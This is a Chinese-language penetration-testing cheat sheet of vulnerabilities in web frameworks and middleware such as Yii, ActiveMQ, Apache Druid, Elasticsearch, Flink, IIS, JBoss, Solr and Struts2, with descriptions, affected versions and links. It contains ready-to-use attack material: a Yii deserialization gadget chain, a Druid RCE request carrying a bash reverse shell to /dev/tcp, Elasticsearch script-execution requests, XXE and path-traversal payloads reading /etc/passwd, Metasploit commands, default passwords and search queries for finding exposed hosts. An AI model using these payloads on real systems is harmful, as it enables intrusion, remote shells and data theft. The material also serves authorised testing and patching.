  • POC | Payload | exp<?phpnamespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls -al'; } }}namespace Faker{ use yii\rest\CreateAction; class Generator{ protected $formatters; public function __construct(){ $this->formatters['close'] = [new CreateAction, 'run']; } }}namespace yii\db{ use Faker\Generator; class BatchQueryResult{ private $_dataReader; public function __construct(){ $this->_dataReader = new Generator; } }}namespace{ echo base64_encode(serialize(new yii\db\BatchQueryResult));}?>- Maskhe/CVE-2020-15148-bypasses

YxCMS

官网 : http://www.yxcms.net

常见路径

/index.php?r=admin  # 后台  默认管理员账号密码 admin 123456

YxCMS 1.4.7 多个漏洞

  • 相关文章 - YxCMS 1.4.7 最新版漏洞分析

zcncms

相关文章

  • zcncms多个漏洞-Musec
  • ZCNCMS审计及漏洞分析
  • 代码审计——zcncms后台SQL注入(一)
  • 代码审计——zcncms几处漏洞合集(二)

Zend

Fofa: app="ZF-Zend-Framework"

config 文件泄露

  • POC | Payload | exp//application/configs/application.ini

五指cms

任意⽂件删除漏洞

  • 相关文章 - ⼀次对五指 cms的任意⽂件删除漏洞挖掘

框架引擎中间件

相关文章

  • 中间件漏洞合集
  • 2020攻防演练弹药库-您有主机上线请注意
  • 企业常见服务漏洞检测&修复整理

工具包

  • 1120362990/vulnerability-list - 在渗透测试中快速检测常见中间件、组件的高危漏洞.
  • hatRiot/clusterd - application server attack toolkit
  • matthiaskaiser/jmet - Java Message Exploitation Tool

ActiveMQ

官网 : https://activemq.apache.org/

Fofa: Apache ActiveMQ

Apache ActiveMQ 是美国阿帕奇 (Apache) 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等.

相关文章

  • ActiveMQ系列漏洞汇总复现

搭建教程

  • ActiveMQ 搭建

默认密码

admin   admin

CVE-2015-1830 Apache ActiveMQ 5.11.1 Directory Traversal / Shell Upload

  • MSF Moduleuse exploit/windows/http/apache_activemq_traversal_upload

CVE-2015-5254 ActiveMQ 反序列化漏洞

  • 描述Apache ActiveMQ 5.13.0 之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的 Java Message Service(JMS)ObjectMessage 对象利用该漏洞执行任意代码.
  • 影响版本- Apache ActiveMQ 5.0.0 ~ 5.12.1
  • 相关文章- ActiveMQ 反序列化漏洞 (CVE-2015-5254)

CVE-2016-3088 ActiveMQ 任意文件写入漏洞

  • 描述ActiveMQ 的 web 控制台分三个应用,admin、api 和 fileserver,其中 admin 是管理员页面,api 是接口,fileserver 是储存文件的接口;admin 和 api 都需要登录后才能使用,fileserver 无需登录.fileserver 是一个 RESTful API 接口,我们可以通过 GET、PUT、DELETE 等 HTTP 请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:- 其使用率并不高- 文件操作容易出现漏洞所以,ActiveMQ 在 5.12.x~5.13.x 版本中,已经默认关闭了 fileserver 这个应用 (你可以在 conf/jetty.xml 中开启之) ;在 5.14.0 版本以后,彻底删除了 fileserver 应用.
  • 影响版本- Apache ActiveMQ < 5.12.x
  • 相关文章- ActiveMQ任意文件写入漏洞 (CVE-2016-3088)

CVE-2017-15709

  • 描述Apache ActiveMQ 默认消息队列 61616 端口对外,61616 端口使用了 OpenWire 协议,这个端口会暴露服务器相关信息,这些相关信息实际上是 debug 信息。会返回应用名称,JVM,操作系统以及内核版本等信息。
  • 影响版本- 5.14.0 < Apache ActiveMQ < 5.14.5- 5.15.0 < Apache ActiveMQ < 5.15.2
  • POC | Payload | exptelnet ip 61616

Axis

官网 : http://axis.apache.org/

Axis 是一个开源的基于 XML 的 Web 服务架构。它包含了 Java 和 C++ 语言实现的 SOAP 服务器,以及各种公用服务及 API 以生成和部署 Web 服务应用。

相关文章

  • Apache Axis1 与 Axis2 WebService 的漏洞利用总结

Axis-1.4-RCE

  • 相关文章- axis 1.4 AdminService未授权访问 jndi注入利用
  • POC | Payload | exp- KibodWapon/Axis-1.4-RCE-Poc

Axis2默认弱口令

  • 相关文章 - 【漏洞复现】Axis2默认弱口令后台Getshell

CAS

项目地址 : https://github.com/apereo/cas

Apereo CAS 4.X 反序列化漏洞

  • 相关文章- Apereo CAS 4.X反序列化漏洞分析- Apereo_CAS_反序列化漏洞分析及利用- Apereo CAS 4.X反序列化漏洞分析及复现- Apereo CAS 4.X execution参数反序列化漏洞分析- [漏洞复现] Apereo CAS 4.X 反序列化命令执行漏洞
  • 相关工具- 21superman/Cas_Exploit - CAS反序列化漏洞利用工具- cL0und/cas4.x-execution-rce - exp for 4.1.x-4.1.6, 4.1.7-4.2.x, padding oracle attack- langligelang/CAS_EXP- MrMeizhi/ysoserial-mangguogan - ApereoCas反序列化回显与检测- nice0e3/Cas_Exploit

Cocoon

官网 : https://cocoon.apache.org/

CVE-2020-11991 XML 注入

  • 描述程序使用了 StreamGenerator 这个方法时,解析从外部请求的 xml 数据包未做相关的限制,恶意用户就可以构造任意的 xml 表达式,使服务器解析达到 XML 注入的安全问题。
  • POC | Payload | expPOST /v2/api/product/manger/getInfo<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]><userInfo><firstName>John</firstName><lastName>&ent;</lastName></userInfo>

ColdFusion

CVE-2017-3066 反序列化漏洞


Druid

Alibaba_Druid

未授权访问

  • 相关文章- Druid未授权(弱口令)的一些利用方式- Druid未授权漏洞实战利用
  • 相关工具- yuyan-sec/druid_sessions

Apache_Druid

官网 : https://druid.apache.org/

Fofa : title="Apache"&&title="Druid"

Apache Druid 是用 Java 编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

CVE-2021-25646

  • 描述Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。
  • 影响版本- Apache Druid < 0.20.1
  • 相关文章- Apache Druid 远程代码执行漏洞 CVE-2021-25646- 漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)
  • POC | Payload | expPOST /druid/indexer/v1/sampler HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1044Connection: close{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx/xxx 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

CVE-2021-26919

  • 相关文章 - Apache Druid CVE-2021-26919 漏洞分析

CVE-2021-36749

  • POC | Payload | expcurl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"

Dubbo

官网 : https://dubbo.apache.org/zh-cn/

fofa: app="APACHE-dubbo"

Apache Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。

相关工具

  • threedr3am/dubbo-exp - Dubbo 反序列化一键快速攻击测试工具,支持 dubbo 协议和 http 协议,支持 hessian 反序列化和 java 原生反序列化。

CVE-2019-17564 pache Dubbo 反序列化漏洞

  • 相关文章 - 漏洞复现|Dubbo反序列化漏洞CVE-2019-17564- [漏洞分析]CVE-2019-17564/Apache Dubbo存在反序列化漏洞- Apache Dubbo反序列化漏洞(CVE-2019-17564)

CVE-2021-30179 Apache Dubbo RCE

  • 相关文章 - CVE-2021-30179:Apache Dubbo RCE复现

CVE-2021-43297

  • 相关文章 - Apache Dubbo Hessian2 异常处理时反序列化(CVE-2021-43297)

ElasticSearch

官网 : https://www.elastic.co/

shodan : port:9200 json

ElasticSearch 是一个基于 Lucene 的搜索服务器.它提供了一个分布式多用户能力的全文搜索引擎,基于 RESTful web 接口.Elasticsearch 是用 Java 开发的,并作为 Apache 许可条款下的开放源码发布,是当前流行的企业级搜索引擎.

未授权访问漏洞

  • http://[ip]:9200
  • http://[ip]:9200/_plugin/head/ web 管理界面
  • http://[ip]:9200/hello/_search?pretty&size=50&from=50
  • http://[ip]:9200/_cat/indices
  • http://[ip]:9200/_river/_search 查看数据库敏感信息
  • http://[ip]:9200/_nodes 查看节点数据
  • http://[ip]:9200/_cat/indices?v 查看当前节点的所有 Index
  • http://[ip]:9200/_search?pretty=true 查询所有的 index, type
  • Elasticvue - 进行未授权访问漏洞利用的插件

CVE-2014-3120 ElasticSearch 命令执行漏洞

  • 描述老版本 ElasticSearch 支持传入动态脚本 (MVEL) 来执行一些复杂的操作,而 MVEL 可执行 Java 代码,而且没有沙盒,所以我们可以直接执行任意代码.
  • 影响版本- ElasticSearch 1.1.1
  • POC | Payload | exp来源: ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境首先,该漏洞需要 es 中至少存在一条数据,所以我们需要先创建一条数据:POST /website/blog/ HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 25{"name": "test"}然后,执行任意代码:POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 343{ "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" } }}

CVE-2015-1427 Groovy 沙盒绕过 && 代码执行漏洞

  • 描述CVE-2014-3120 后,ElasticSearch 默认的动态脚本语言换成了 Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。
  • 影响版本- ElasticSearch < 1 .3.7- ElasticSearch 1.4.0 ~ 1.4.2
  • 相关文章- Remote Code Execution in Elasticsearch - CVE-2015-1427
  • POC | Payload | exp来源: ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境由于查询时至少要求 es 中有一条数据,所以发送如下数据包,增加一个数据:POST /website/blog/ HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 25{"name": "test"}然后发送包含 payload 的数据包,执行任意命令:POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/textContent-Length: 156{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

CVE-2015-3337 目录穿越漏洞

  • 描述在安装了具有"site"功能的插件以后,插件目录使用 ../ 即可向上跳转,导致目录穿越漏洞,可读取任意文件.没有安装任意插件的 elasticsearch 不受影响.
  • 影响版本- ElasticSearch < 1.4.4- ElasticSearch 1.5.0 ~ 1.5.1
  • POC | Payload | exp来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/- http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd (不要在浏览器访问)- http://your-ip:9200/_plugin/head/

CVE-2015-5531

  • 描述elasticsearch 1.5.1 及以前,无需任何配置即可触发该漏洞.之后的新版,配置文件 elasticsearch.yml 中必须存在 path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置.不配置该值,默认不启动这个功能.
  • 影响版本- ElasticSearch < 1.6.0
  • 相关文章- Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)
  • POC | Payload | exp来源: https://vulhub.org/#/environments/elasticsearch/CVE-2015-5531/新建一个仓库```PUT /_snapshot/test HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 108{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" }}创建一个快照PUT /_snapshot/test2 HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 108{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" }}目录穿越读取任意文件http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd```在错误信息中包含文件内容 (编码后) ,对其进行解码即可获得文件

log4j 影响


Flink

官网 : https://flink.apache.org/

Fofa: app="APACHE-Flink"

CVE-2020-17518 文件写入

CVE-2020-17519 文件读取

  • 相关文章- 漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析
  • POC | Payload | exphttp://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

httpd

CVE-2007-6750 Apache ddos

  • 描述Apache HTTP Server 1.x版本和2.x版本中存在资源管理错误漏洞。该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。
  • MSF Moduleuse auxiliary/dos/http/slowlorisset RHOST <rhost>run

CVE-2017-15715 Apache 解析漏洞

  • 影响版本- 2.4.0 < HTTPD <2.4.29
  • 相关文章- 利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单- Apache HTTPD 换行解析漏洞(CVE-2017-15715)

SSI 远程命令执行漏洞

  • 相关文章 - Apache SSI 远程命令执行漏洞

CVE-2019-0211 Apache HTTP 服务组件提权漏洞

  • 相关文章- Apache 提权漏洞(CVE-2019-0211)复现
  • POC | Payload | exp- CVE-2019-0211-apache

CVE-2021-40438

  • 相关文章- 【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现- Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
  • POC | Payload | exp- Apache CVE-2021-40438

CVE-2021-41773 Apache HTTP Server 路径穿越漏洞

  • 相关文章 - CVE-2021-41773-Apache HTTP Server 路径穿越漏洞快速分析与复现

CVE-2021-42013 Apache任意文件读取补丁绕过

  • 相关文章 - Apache任意文件读取补丁绕过(CVE-2021-42013)- Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现

IIS

相关文章

  • Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS!

IIS shortname

  • 描述windows 在创建一个新文件时,操作系统还会生成 8.3 格式的兼容 MS-DOS 的(短)文件名,以允许基于 MS-DOS 或16位 windows 的程序访问这些文件.
  • 修复方案1. 升级 .net framework 至 4.0 版本或以上2. 修改 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem 值 NtfsDisable8dot3NameCreation 为 1
  • 相关文章- IIS短文件名漏洞- IIS短文件名泄露漏洞修复- IIS短文件/文件夹漏洞(汇总整理) - 红队第7篇:IIS短文件名猜解在拿权限中的巧用,付脚本下载
  • POC | Payload | exp1. http://www.xxx.com/*~1*/.aspx2. http://www.xxx.com/l1j1e*~1*/.aspx# 若1返回404而2返回400,则可以判断目标站点存在漏洞.http://www.xxx.com/a*~1*/.aspx# 若存在将返回404,不存在则返回400.以此类推,不断向下猜解所有的6个字符.Windows Server 2008 R2查询是否开启短文件名功能:fsutil 8dot3name query关闭该功能:fsutil 8dot3name set 1Windows Server 2003关闭该功能:fsutil behavior set disable8dot3 1- lijiejie/IIS_shortname_Scanner- irsdl/IIS-ShortName-Scanner

.Net Framework 拒绝服务攻击

  • 描述当请求文件夹名称包含 ~1 的请求,会导致不存在该文件的 .Net Framework 去递归查询所有根目录.如果只有一个"1"是无效的,当"1"大于一个,比如像这样:/wwwtest/fuck~1/~1/~1/~1.aspx此时文件系统会这样调用:\wwwtest SUCCESS\wwwtest\fuck~1\~1\~1\~1 PATH NOT FOUND\wwwtest\fuck~1 NAME NOT FOUND\wwwtest\fuck~1\~1\ PATH NOT FOUND\wwwtest\fuck~1\~1\~1\ PATH NOT FOUND\wwwtest\fuck~1\~1\~1\~1.aspx PATH NOT FOUND\wwwtest\fuck~1\~1\~1\~1.aspx PATH NOT FOUND\wwwtest\fuck~1\~1\~1 PATH NOT FOUND\wwwtest\fuck~1\~1\~1\~1.aspx PATH NOT FOUND\wwwtest\fuck~1\~1\~1 PATH NOT FOUND\wwwtest\fuck~1\~1 PATH NOT FOUND\wwwtest\fuck~1 NAME NOT FOUND\wwwtest SUCCESS\wwwtest SUCCESS如果我们请求的文件/文件夹名同时存在大小写时,这个请求会被请求两次,一次是原封不动的请求,一次是全部使用小写的请求.下表显示了每个请求的 FS 调用的数量(Windows 2008 R2, IIS 7.5(latest patch - June 2012), and .Net framework 4.0.30319 (在别的系统下可能会不同))

CVE-2017-7269 IIS6.0 RCE

  • 描述CVE-2017-7269 是 IIS 6.0 中存在的一个栈溢出漏洞,在 IIS6.0 处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行 memcpy 对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行。
  • 影响版本- IIS 6.0- win 2003-r2
  • 相关文章- CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit
  • POC | Payload | exp- zcgonvh/cve-2017-7269- zcgonvh/cve-2017-7269-tool- lcatro/CVE-2017-7269-Echo-PoC- edwardz246003/IIS_exploit
  • MSF Moduleuse exploit/windows/iis/cve-2017-7269

JBOSS

官网 : http://www.jboss.org/

相关文章

  • jboss常见漏洞复现
  • Jboss漏洞总结

相关工具

  • joaomatosf/jexboss - JBoss(和其他Java反序列化漏洞)验证和利用工具

目录结构

home 文件夹

  • bin:该目录包含所有入口点 Java 包 (Java Archives, JAR) 和脚本, 包括启动和关闭。
  • client:该目录存储可能由外部 Java 客户端应用使用的配置文件。
  • commion:该目录包含所有服务端的通用 JAR 包及配置文件。
  • docs:该目录包含 JBoss 文档及模式 (schema), 它们在开发过程中非常有用。
  • lib:该目录包含 JBoss 启动所需的所有 JAR 包。
  • server:该目录包含与不同服务器配置相关的文件, 包括正式环境和测试环境。

/server/default 文件夹

  • conf:该目录包含配置文件, 包括 1ogin-config 及 bootstrap config。
  • data:该目录可用于在文件系统中存储内容的服务。
  • deploy:该目录包含部署在服务器上的 WAR 文件。
  • lib:该目录是启动时把静态 Java 类库加载到共享类路径的默认位置。
  • Log:该目录是所有日志写入的目录。
  • tmp:JBoss 使用该目录存储临时文件。
  • work:该目录包含编译后的 JSP 和类文件。

/server/default/deploy 文件夹

  • admin-console.war:是 JBoss AS 的管理控制台
  • ROOT. war:根 (/root) Web 应用程序。
  • jbossweb.sar:服务器上部署的 Tomcat Servlet 引擎。
  • jbossws.sar:支持 Web 服务的 JBoss 服务。

未授权访问漏洞

  • 描述部分版本 JBoss 默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。- http://[ip]:8080/jmx-console

CVE-2016-7065 Red Hat JBoss EAP - Deserialization of Untrusted Data

  • 描述JBoss 企业应用程序平台(EAP)4和5中的 JMX servlet 允许远程 DOS,并可能通过精心设计的序列化 Java 对象执行任意代码。
  • 影响版本- JBOSS 4.0.0- JBOSS 5.0.0
  • POC | Payload | exp- Red Hat JBoss EAP - Deserialization of Untrusted Data

CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞

  • 描述JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
  • POC | Payload | exp- JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

CVE-2017-12149 JBoss 5.x/6.x 反序列化漏洞

  • 描述该漏洞为 Java 反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
  • 影响版本- JBOSS 5.0.0 ~ 5.2.2
  • POC | Payload | exp- yunxu1/jboss-_CVE-2017-12149- jreppiks/CVE-2017-12149- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

JMXInvokerServlet 反序列化漏洞

  • POC | Payload | exp - JBoss JMXInvokerServlet 反序列化漏洞

Jetty

CVE-2021-28164 && CVE-2021-28169


Nacos

FOFA: title="Nacos"

CVE-2021-29441 && CVE-2021-29442 nacos v1.x authentication bypass

Nacos Client Yaml反序列化

  • 影响版本- Nacos < 1.4.2
  • 相关文章- Nacos Client Yaml反序列化漏洞分析

Resin

官网 : https://caucho.com/

相关文章

  • 针对Resin服务的攻击向量整理

Resin 任意文件读取漏洞

  • 相关文章 - Resin任意文件读取漏洞

Resin 文件解析漏洞

  • 相关文章 - Resin容器文件解析漏洞深入分析

Nginx

CVE-2021-23017

  • 相关文章 - 对 Nginx DNS 解析漏洞的应急响应

RabbitMQ

Fofa: app="RabbitMQ"

默认口令

guest
guest

RocketMQ

Tips

  • 4.0.x ~ 4.3.x 存在 fastjson 1.2.29

Shiro

  • Shiro

Solr

官网 : https://lucene.apache.org/solr/

Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本的处理.

Solr 的漏洞情报参考 https://issues.apache.org/jira/projects/SOLR/issues

资源

  • Imanfeng/Apache-Solr-RCE - Solr RCE 整理
  • veracode-research/solr-injection - Apache Solr 注入研究

CVE-2017-12629 Apache solr XML 实体注入漏洞

  • 描述原理大致是文档通过 Http 利用 XML 加到一个搜索集合中.查询该集合也是通过 http 收到一个 XML/JSON 响应来实现.此次 7.1.0 之前版本总共爆出两个漏洞:XML 实体扩展漏洞 (XXE) 和远程命令执行漏洞 (RCE) ,二者可以连接成利用链,编号均为 CVE-2017-12629.
  • 影响版本- Apache solr 5.5.0 ~ 5.5.4- Apache solr 6.0.0 ~ 6.6.1- Apache solr 7.0.0 ~ 7.0.1
  • 相关文章- Apache solr XML 实体注入漏洞 (CVE-2017-12629) - Apache Solr 远程命令执行漏洞 (CVE-2017-12629)

CVE-2019-0192 Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5

CVE-2019-0193 Apache Solr 远程命令执行漏洞

  • 描述此次漏洞出现在 Apache Solr 的 DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据.它具有一个功能,其中所有的 DIH 配置都可以通过外部请求的 dataConfig 参数来设置.由于 DIH 配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行.
  • 影响版本- Apache solr < 8.2.0
  • 相关文章- Apache Solr 远程命令执行漏洞 (CVE-2019-0193) - Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
  • POC | Payload | exp- jas502n/CVE-2019-0193- 1135/solr_exploit

CVE-2019-12409

  • 相关文章- Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析
  • POC | Payload | exp- jas502n/CVE-2019-12409

CVE-2019-17558 Apache Solr Velocity 模版注入远程命令执行漏洞

  • 描述2019年10月,安全研究人员放出了一个关于 solr 模板注入的 exp,攻击者通过未授权访问 solr 服务器,发送特定的数据包开启 params.resource.loader.enabled,然后 get 访问接口导致服务器命令执行,命令回显结果在 response。
  • 影响版本- Apache Solr < 8.2.0
  • 相关文章- Apache Solr最新漏洞复现- Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC- Apache Solr Velocity RCE 真的getshell了吗?
  • POC | Payload | exp- jas502n/solr_rce- SDNDTeam/CVE-2019-17558_Solr_Vul_Tool - Solr 模板注入漏洞图形化一键检测工具- Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)

CVE-2020-13957 Apche Solr 未授权上传

  • 描述在特定的 Solr 版本中 ConfigSet API 存在未授权上传漏洞,攻击者利用漏洞可实现远程代码执行。
  • 影响版本- Apache Solr 6.6.0 -6.6.5- Apache Solr 7.0.0 -7.7.3- Apache Solr 8.0.0 -8.6.2
  • 相关文章- CVE-2020-13957:Apche Solr 未授权上传漏洞复现- CVE-2020-13957 Apache Solr 未授权上传漏洞- CVE-2020-13957:Apache Solr 未授权上传漏洞复现

Apache Solr =< 8.8.1 任意文件读取漏洞

  • 相关文章- Solr任意文件读取漏洞环境搭建和复现
  • POC | Payload | expGET /solr/admin/cores?wt=jsonGET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream

Apache Solr<= 8.8.2 任意文件删除

  • 相关文章 - Apache Solr<= 8.8.2 (最新) 任意文件删除

CVE-2021-27905 ssrf

  • POC | Payload | exp - Henry4E36/Solr-SSRF

Spring

  • Spring

Struts2

官网 : https://struts.apache.org/

fofa: app="Struts2"

Struts2 的漏洞情报参考 https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

指纹

  • Struts
  • .action
  • .do
  • .action!xxxx
  • .c

相关工具

  • Lucifer1993/struts-scan - Python2 编写的 struts2 漏洞全版本检测和利用工具
  • HatBoy/Struts2-Scan - Python3 Struts2 全漏洞扫描利用工具
  • shack2/Struts2VulsTools - Struts2 系列漏洞检查工具
  • x51/STS2G - Golang 版 Struts2 漏洞扫描利用工具

环境搭建

  • wh1t3p1g/Struts2Environment - Struts2 历史版本的漏洞环境
  • sie504/Struts-S2-xxx - 整理收集Struts2漏洞环境
  • shengqi158/S2-055-PoC - S2-055的环境,基于rest-show-case改造

相关文章

  • Struts2 历史 RCE 漏洞回顾不完全系列

S2-016 & CVE-2013-2251

  • https://cwiki.apache.org/confluence/display/WW/S2-016
  • 描述DefaultActionMapper 类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟 OGNL 表达式,由于 struts2 没有对这些前缀做过滤,导致利用 OGNL 表达式调用 java 静态方法执行任意系统命令
  • 影响版本- Struts 2.0.0 ~ 2.3.15
  • POC | Payload | exp- OneSourceCat/s2-016-exp

S2-020 & CVE-2014-0094 & CNNVD-201403-191

  • https://cwiki.apache.org/confluence/display/WW/S2-020
  • 描述Apache Struts 2.0.0-2.3.16 版本的默认上传机制是基于 Commons FileUpload 1.3 版本,其附加的 ParametersInterceptor 允许访问'class' 参数(该参数直接映射到 getClass() 方法),并允许控制 ClassLoader。在具体的 Web 容器部署环境下(如:Tomcat),攻击者利用 Web 容器下的 Java Class 对象及其属性参数(如:日志存储参数),可向服务器发起远程代码执行攻击,进而植入网站后门控制网站服务器主机。
  • 影响版本- Struts 2.0.0 ~ 2.3.16.1
  • 相关文章- Struts2 S2-020在Tomcat 8下的命令执行分析
  • POC | Payload | exp- https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Struts2/S2-020_POC.py

S2-045 & CVE-2017-5638

  • https://cwiki.apache.org/confluence/display/WW/S2-045
  • 描述恶意用户可在上传文件时通过修改 HTTP 请求头中的 Content-Type 值来触发该漏洞进而执行系统命令.
  • 影响版本- Struts 2.3.5 ~ 2.3.31- Struts 2.5 ~ 2.5.10
  • POC | Payload | exp- tengzhangchao/Struts2_045-Poc- iBearcat/S2-045

S2-046 & CVE-2017-5638

  • https://cwiki.apache.org/confluence/display/WW/S2-046
  • 描述该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改 HTTP 请求头中的 Content-Type 值,构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令.
  • 影响版本- Struts 2.3.5 ~ 2.3.31- Struts 2.5 ~ 2.5.10
